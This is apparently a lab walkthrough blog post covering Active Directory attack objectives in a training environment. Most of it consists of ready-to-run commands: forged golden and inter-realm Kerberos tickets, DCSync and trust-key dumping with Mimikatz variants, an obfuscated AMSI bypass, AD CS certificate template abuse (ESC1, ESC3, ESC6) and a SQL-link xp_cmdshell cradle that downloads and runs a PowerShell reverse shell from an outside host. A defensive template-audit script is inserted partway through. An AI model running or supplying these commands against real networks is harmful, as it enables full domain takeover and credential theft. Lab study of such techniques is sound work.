C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f7277dcaf640d00ddd2744143b346c36 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

If all is good, you should see "Final ticket saved to file !"

We can use Rubeus to use this ticket as such

C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

Then check if we can access the file system on mcorp-dc as such

dir \\mcorp-dc.moneycorp.local\c$

Using Invoke-Mimi and Old Kekeo

Starting with the DA process

powershell -ep bypass

cd C:\AD\Tools\

$sess = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Enter-PSSession -Session $sess

S`eTIt`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -
VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession -Session $sess

Invoke-Mimi -Command '"lsadump::trust /patch"'

Then create the inter-realm TGT by running the below command on your machine using the rc4_hmac_nt of dollarcorp.moneycorp.local -> moneycorp.local

Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:132f54e05f7c3db02e97c00ff3879067 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust2_tkt.kirbi"'

Then, create a TGS for a service in the parent domain (asktgs is in \AD\Tools\kekeo_old)

.\asktgs.exe C:\AD\Tools\kekeo_old\trust2_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

Present the TGS to the target service

.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

Now try to access the target service, a success means escalation to the parent DA

ls \\mcorp-dc.moneycorp.local\c$

Learning Objective 19

Using DA access to dollarcorp.moneycorp.local, escalate privileges to EA or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash. Let’s create the inter-realm TGT and inject it by running the below command from an elevated command prompt:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

Then check if we can access moneycorp DC

dir \\mcorp-dc.moneycorp.local\c$

If we get output, all is good. Let’s run a DCSync attack against mcorp-dc to extract its secrets:

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Learning Objective 20

With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest. We need the trust key for the trust between dollarcorp and eurocorp, which we can get with mimikatz or safetykatz. Start a process with DA privileges with Rubeus:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Using SafetyKatz.exe

Run the below commands from the process running as DA to copy loader.exe to dcorp-dc and use it to extract the trust key

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

lsadump::trust /patch

Then run the below command from an elevated command prompt using the rc4 hash extracted earlier to create the ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:163373571e6c3e09673010fd60accdf0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"

Then use the ticket with Rubeus

C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

and check if we have access using

dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Using Invoke-Mimikatz and old Kekeo

With DA privileges from earlier, run the following command to retrieve the trust key for the trust between dollarcorp and eurocorp

Invoke-Mimi -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Create the inter-realm TGT

Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:163373571e6c3e09673010fd60accdf0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

then use asktgs in the kekeo_old directory as such

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local

Present the TGS to the CIFS service

.\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi

and check if we have access with

ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Learning Objective 21

Check if AD CS is used by the target forest and find any vulnerable or abusable templates, if so then abuse the template to escalate to DA and EA. We can use Certify.exe to check for AD CS in moneycorp.

C:\AD\Tools\Certify.exe cas

Then we can list all the templates using the “find” command

C:\AD\Tools\Certify.exe find

C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject

We see that the HTTPSCertificates template looks interesting, as the msPKI-Certificates-Name-Flag is Enrollee_Supplies_Subject and the enrollment rights contain dcorp/RDPUsers, a group that we know our student is a member of. This means we can request a certificate for any user as the student. We’ll use the below command to request a certificate for a domain admin.

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem. We need to convert it to PFX to use it. We can use the openssl binary on our student VM to do that.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

and enter a password when prompted. Then we can use rubeus to request a TGT for DA administrator.

C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

Check if we have DA privileges

winrs -r:dcorp-dc whoami

Cool, we can use a similar method to escalate to EA, by requesting a certificate for the EA account

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator

And do the same thing shown earlier to extract the key and convert it to PFX

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx

Use Rubeus again to request TGT for EA.

C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt

and check our access with

winrs -r:mcorp-dc whoami

Privilege Escalation to DA and EA using ESC3

If we list vulnerable templates in moneycorp using this command:

C:\AD\Tools\Certify.exe find /vulnerable

We can see that the SmartCardEnrollment-Agent template has EKU for Certificate Request Agents, and grants enrollment rights to domain users. If we can find another template that has an EKU that allows for domain authentication and has an application policy requirement of the certificate request agent, we can request certs on behalf of any user. Use the find command again and look for application policies with the certificate request agent. In this case SmartCardEnrollment-Users has enrollment rights for dcorp\Domain Users.

We can request an enrollment agent certificate from the template “SmartCardEnrollment-Agent”

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent

And like earlier, save the certificate to esc3.pem and convert it to pfx and set a password for it.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

Then we can use the Enrollment Agent Certificate to request a certificate for DA from the template SmartCardEnrollment-Users

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

Once again, save this cert as esc3-DA.pem and convert it to pfx.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-DA.pfx

And use the esc3-DA.pfx created above with Rubeus and request a TGT for DA

C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

Check if we have DA with

winrs -r:dcorp-dc whoami

To escalate to Enterprise Admin, we just need to change the request to SmartCardEnrollment-Users template with Rubeus. Note that we are using ‘/onbehalfof:mcorp\administrator’ here

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

Once more, convert it to esc3-EA.pfx using openssl and use rubeus

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-EA.pfx

C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt

Then access mcorp-dc

winrs -r:mcorp-dc whoami

Privilege escalation to DA and EA using ESC6

C:\AD\Tools\Certify.exe cas

And we are looking for

[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!

This means we can request a certificate for ANY user from a template that will allow enrollment for normal or low-priv users.

C:\AD\Tools\Certify.exe find

And we see again that RDPUsers have Enrollment Rights in the CA-Integration template. As a member of the RDPUsers group, we can request a certificate for any user using the CA-Integration template. For EA, use /altname:moneycorp.local\administrator, and for DA use the below command

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator

Save it to esc6-DA and convert it to pfx using OpenSSL, then use rubeus once again to request a TGT for DA

C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:C:\AD\Tools\esc6-DA.pfx /password:SecretPass@123 /ptt

winrs -r:dcorp-dc whoami
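
The three AD CS conditions used in this objective (ESC1, ESC3 and ESC6) can be expressed as checks over template attributes and the CA's EditFlags. The following is an added example, not part of the original notes or of Certify: the function name, the low-privilege group list, the EKUs assigned to each template and the EditFlags value are constructed assumptions, while the template names are the ones that appear above.

```powershell
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1       # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2       # bit in msPKI-Enrollment-Flag (manager approval)
$EDITF_ATTRIBUTESUBJECTALTNAME2    = 0x40000   # bit in the CA policy EditFlags value
$RequestAgentEku = '1.3.6.1.4.1.311.20.2.1'    # Certificate Request Agent
$AuthEku = @(
    '1.3.6.1.5.5.7.3.2'        # Client Authentication
    '1.3.6.1.5.2.3.4'          # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2'   # Smart Card Logon
    '2.5.29.37.0'              # Any Purpose
)
# Groups treated as low privilege here (assumption; adjust to your environment).
$LowPrivGroups = 'Domain Users', 'Authenticated Users', 'Everyone', 'Domain Computers', 'RDPUsers'

function Get-TemplateFinding {
    param(
        [Parameter(Mandatory)] [object[]] $Templates,
        [int] $CaEditFlags = 0
    )
    $sanFromRequest = [bool]($CaEditFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2)
    foreach ($t in $Templates) {
        $lowPriv = @($t.EnrollmentRights | Where-Object { ($_ -split '\\')[-1] -in $LowPrivGroups })
        if ($lowPriv.Count -eq 0) { continue }

        $eku        = @($t.Eku | Where-Object { $_ })
        # A template with no EKU at all is usable for any purpose, authentication included.
        $allowsAuth = ($eku.Count -eq 0) -or [bool]($eku | Where-Object { $_ -in $AuthEku })
        $approval   = [bool]($t.EnrollmentFlag -band $CT_FLAG_PEND_ALL_REQUESTS)
        $ungated    = -not $approval -and ($t.RaSignature -eq 0)

        $issues = @()
        if ($ungated -and $allowsAuth -and ($t.NameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)) {
            $issues += 'ESC1: enrollee supplies the subject'
        }
        if ($ungated -and ($RequestAgentEku -in $eku)) {
            $issues += 'ESC3: issues enrollment agent certificates'
        }
        if (-not $approval -and $allowsAuth -and ($RequestAgentEku -in @($t.RaApplicationPolicies))) {
            $issues += 'ESC3: accepts on-behalf-of requests from enrollment agents'
        }
        if ($ungated -and $allowsAuth -and $sanFromRequest) {
            $issues += 'ESC6: CA accepts a requester-supplied SAN'
        }
        foreach ($i in $issues) {
            [pscustomobject]@{ Template = $t.Name; Enrollees = $lowPriv -join ', '; Issue = $i }
        }
    }
}

# Constructed template records. Live values come from the template objects' attributes
# msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature,
# pKIExtendedKeyUsage and msPKI-RA-Application-Policies.
$templates = @(
    [pscustomobject]@{ Name='HTTPSCertificates';         NameFlag=0x1; EnrollmentFlag=0; RaSignature=0; Eku=@('1.3.6.1.5.5.7.3.2'); RaApplicationPolicies=@(); EnrollmentRights=@('dcorp\RDPUsers') }
    [pscustomobject]@{ Name='SmartCardEnrollment-Agent'; NameFlag=0;   EnrollmentFlag=0; RaSignature=0; Eku=@($RequestAgentEku);    RaApplicationPolicies=@(); EnrollmentRights=@('dcorp\Domain Users') }
    [pscustomobject]@{ Name='SmartCardEnrollment-Users'; NameFlag=0;   EnrollmentFlag=0; RaSignature=1; Eku=@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'); RaApplicationPolicies=@($RequestAgentEku); EnrollmentRights=@('dcorp\Domain Users') }
    [pscustomobject]@{ Name='CA-Integration';            NameFlag=0;   EnrollmentFlag=0; RaSignature=0; Eku=@('1.3.6.1.5.5.7.3.2'); RaApplicationPolicies=@(); EnrollmentRights=@('dcorp\RDPUsers') }
    [pscustomobject]@{ Name='AdminOnlyTemplate';         NameFlag=0x1; EnrollmentFlag=0; RaSignature=0; Eku=@('1.3.6.1.5.5.7.3.2'); RaApplicationPolicies=@(); EnrollmentRights=@('mcorp\Domain Admins') }
)

# Constructed EditFlags value with the SAN bit set; on a CA it is read with
#   certutil -getreg policy\EditFlags
Get-TemplateFinding -Templates $templates -CaEditFlags 0x15014e | Format-Table -AutoSize -Wrap
```

Clearing the CA flag with `certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` (followed by a restart of the certificate service) removes the ESC6 findings, while the ESC1 and ESC3 findings are fixed on the templates themselves by requiring approval, narrowing enrollment rights or removing the subject-supply flag.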

Learning Objective 22

In this objective we get a reverse shell on the SQL server in eurocorp forest by abusing database links from dcorp-mssql. We start with enumerating SQL servers in the domain and see if our student account has privileges to connect to any of them. We can use the PowerUpSQL module as shown below after starting invisishell:

Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1

Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

We can then use Get-SQLServerLinkCrawl for crawling database links automatically.

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose

If XP_cmdshell is enabled, it is possible to execute commands on eu-sql using linked databases.

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'whoami'"

Let’s execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance. Remember to start a listener first with

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Then run

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.20/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.20/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.20/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql
This post is licensed under CC BY 4.0 by the author.